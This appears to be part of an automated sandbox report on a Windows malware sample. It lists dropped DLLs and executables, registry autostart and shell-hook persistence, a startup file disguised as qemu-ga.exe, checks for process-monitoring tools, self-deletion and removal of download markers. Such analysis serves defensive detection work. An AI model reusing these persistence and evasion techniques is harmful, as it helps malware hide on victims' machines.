Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FP4S7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmidi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KOPPR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	File created: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\da.dll (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\ABF7.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\jfhrjta	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libdtsdec.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\basswv.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OI81K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RV73J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libFLAC_dynamic.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\opusenc.exe (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3FF8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-IE3LC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\7z.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	File created: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KMJ34.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TIUE0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\libwebp.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\daiso.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-62HR3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-JRUFU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QLQ4O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_ofr.dll (copy)	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\ProgramData\xQfUeydaBrjuHptx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-VFKEO.tmp	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3613.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-6USPQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_fx.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DQAC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Windows\Panther\UnattendGC\lua51.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7D14.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmix.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MVB0G.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\is-5320E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Program Files (x86)\ClocX\uninst.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassape.dll (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\617D.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PTF13.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-01JPP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3613.exe	File created: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vghrjta	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-338K7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9PQ68.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_aac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\gain_analysis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9234.exe	File created: C:\Users\user\AppData\Local\Temp\Costura\1485B29524EF63EB83DF771D39CCA767\64\sqlite.interop.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-9RJ1O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\pcm2dsd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Program Files (x86)\ClocX\ClocX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\mp3gain.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HPIH3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-2N2OT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\wavpackdll.dll (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4BEF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KGUCQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	File created: C:\Program Files (x86)\DataPumpCRT\bin\x86\d_writer.dll (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\ProgramData\xQfUeydaBrjuHptx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\etopt.exe

File created: C:\Windows\Panther\UnattendGC\lua51.dll

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\jfhrjta			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vghrjta			Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3Ex NULL
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3Ex NULL
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx NULL
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx NULL

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\7D14.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Window searched: window name: RegmonClass

Source: C:\Users\user\AppData\Local\Temp\7D14.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClocX
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClocX\ClocX.lnk
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClocX\Uninstall.lnk
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

Source: C:\Users\user\AppData\Local\Temp\9234.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service Scheduler
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service Scheduler

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\w73pcbsh71.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\jfhrjta:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\vghrjta:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	24_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	24_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004241EC IsIconic,SetActiveWindow,SetFocus,	24_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004241A4 IsIconic,SetActiveWindow,	24_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	24_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	24_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_004175A8 IsIconic,GetCapture,	24_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00417CDE IsIconic,SetWindowPos,	24_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	24_2_00417CE0
Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp	Code function: 24_2_00481E2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	24_2_00481E2C

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp

Code function: 24_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

24_2_0044AEAC

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\907.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
